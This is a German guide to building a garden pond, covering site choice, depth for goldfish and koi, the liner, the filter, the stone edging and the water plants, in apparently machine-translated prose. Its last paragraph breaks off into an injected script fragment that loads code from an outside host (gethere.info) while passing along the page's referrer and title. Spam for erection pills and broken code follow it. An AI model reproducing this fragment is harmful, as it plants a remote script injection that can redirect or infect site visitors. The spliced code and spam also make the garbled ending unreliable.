Wählen Sie den angemessenen Ort. Wählen Sie eine Umgebung, die relativ flach ist. Ihr Teich sollte an einem Ort bekommen, der vier bis sechs Stunden Sonnenstunden pro Tag erhält, wenn Sie Wasserpflanzen in die Gestaltung einbeziehen möchten. Vermeiden Sie den Teich an einer Stelle anzulegen, wo er leicht verdreckt. Sie wollen doch nicht, dass Dünger oder Reste in Ihrem Teich geraten.
Bestimmen Sie die Größe und Form Ihres Teiches. Verwenden Sie Ihren Gartenschlauch, um eine grobe Skizze des Teiches zu erstellen, bevor Sie mit dem Graben beginnen. Scheuen Sie nicht ein wenig größer anzulegen, als was Sie sich vorgestellt haben, schaffen zu können. Der fertige Teich wird etwas kleiner als das Loch, das Sie graben. Ein größerer Teich bietet zusätzliche Stabilität, wenn es darum geht, Schwankungen der Qualität von Temperatur und Wasser auszugleichen. Dies macht es einfacher ihn zu unterhalten.
Graben Sie den tiefsten Teil des Teiches mindestens 60 cm tief, wenn Sie planen Goldfische zu halten. Größere Fische wie Koi, benötigen eine Tiefe von mindestens 90 cm. Planen Sie nach der Einstufung ihrer Gegend in die öffentliche Überwinterungsklasse für Fische. Für einen Teich mit Fisch empfiehlt es sich, noch tiefer zu graben, sodass der Teich im Winter nicht durchfrieren kann.
Legen Sie eine Umrandung um den Teich für Pflanzen an. Die Umrandung sollte 30 cm unter der erwarteten Oberfläche des Wassers erreichen und 30 cm breit sein.
Positionieren Sie externe Teichabschäumer oder Teichfilter in der richtigen Position, und stellen Sie sicher, dass Ihre ausgewählten Positionen einheitlich sind. Da die Installationsanforderungen mit Typ und Marke der Ausrüstung variieren, ist es wichtig, die Anweisungen gründlich zu lesen, die ein neuer Teichfilter mit sich bringt
Begradigen Sie Ihre Ausgrabung mit Teichunterfütterung. Entfernen Sie gröbere Felsen oder Wurzeln, bevor Sie die Ausgrabung mit einer Unterfütterung versehen.
Die Gummiteichmatte über Ihre Ausgrabung zentrieren und vorsichtig entfalten. Ein paar kleine Falten sind ok. Sie werden nachlassen, wenn der Teich mit Wasser gefüllt ist, aber versuchen Sie möglichst zu vermeiden. Sie müssen die Matte ein bisschen drapieren und außen anpassen. Schließen Sie den Teich an den Teichpoint Oberflächenabsauger. Arbeiten Sie nach den Anweisungen von Teichpoint.
Platzieren Sie Ihre Steine oder eine andere Umrandung entlang des Teichrandes. Die Steine sollten gestellt werden, sodass sie die Teichmatte andrücken. Sie sollten die Teichmatte unter dem Stein leicht zusammenklappen können. Falten Sie die Teichmatte unter der Umrandung beruhigt um. Dies schädigt die Teichmatte nicht.
Füllen Sie Ihren Teich mit Wasser. Lassen Sie alles ein paar Tage ruhen bevor Pflanzen oder Fische eingesetzt werden. Dies ermöglicht alles Chlor im Wasser zu verdunsten, damit er freundlicher für lebende Organismen wird. Ein neuer Teichfilter ist hierbei gut geeignet
Obwohl sie hauptsächlich dekorativ erscheinen sollen, erfüllen die Wasserpflanzen eine wichtige Funktion in Ihren Teich-Ökosystem. Sie verbrauchen die Nährstoffe, die sonst für das Wachstum der Algen bereit wären, was zu einem gesünderen Teich beiträgt. Wasserpflanzen sind gut für die Verwertung von Fischabfällen. Fischen und Amphibien bieten Sie Verstecke und Schatten.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; erection pills for men } else {